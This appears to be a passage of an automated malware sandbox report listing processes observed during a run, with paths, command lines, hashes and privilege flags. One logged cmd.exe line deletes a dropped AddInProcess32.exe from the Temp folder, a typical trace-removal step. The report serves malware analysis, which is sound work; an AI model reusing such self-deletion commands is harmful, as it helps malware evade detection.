                                                                                                  Reputation:moderate

                                                                                                  General

                                                                                                  Start time:19:15:56
                                                                                                  Start date:26/01/2021
                                                                                                  Path:C:\Windows\System32\WerFault.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 3424 -s 8832
                                                                                                  Imagebase:0x7ff708910000
                                                                                                  File size:494488 bytes
                                                                                                  MD5 hash:2AFFE478D86272288BBEF5A00BBEF6A0
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  General

                                                                                                  Start time:19:15:59
                                                                                                  Start date:26/01/2021
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                                                  Imagebase:0x11d0000
                                                                                                  File size:232960 bytes
                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:19:16:00
                                                                                                  Start date:26/01/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff724c50000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:19:16:12
                                                                                                  Start date:26/01/2021
                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:explorer.exe
                                                                                                  Imagebase:0x7ff6fee60000
                                                                                                  File size:3933184 bytes
                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:19:16:31
                                                                                                  Start date:26/01/2021
                                                                                                  Path:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                                                  Imagebase:0x7ff676950000
                                                                                                  File size:13606304 bytes
                                                                                                  MD5 hash:C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  General

                                                                                                  Start time:19:17:39
                                                                                                  Start date:26/01/2021
                                                                                                  Path:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe' -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                                                  Imagebase:0x7ff676950000
                                                                                                  File size:13606304 bytes
                                                                                                  MD5 hash:C4A9ACE9CDB9E5DB7CBA996CFA9EA7A2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >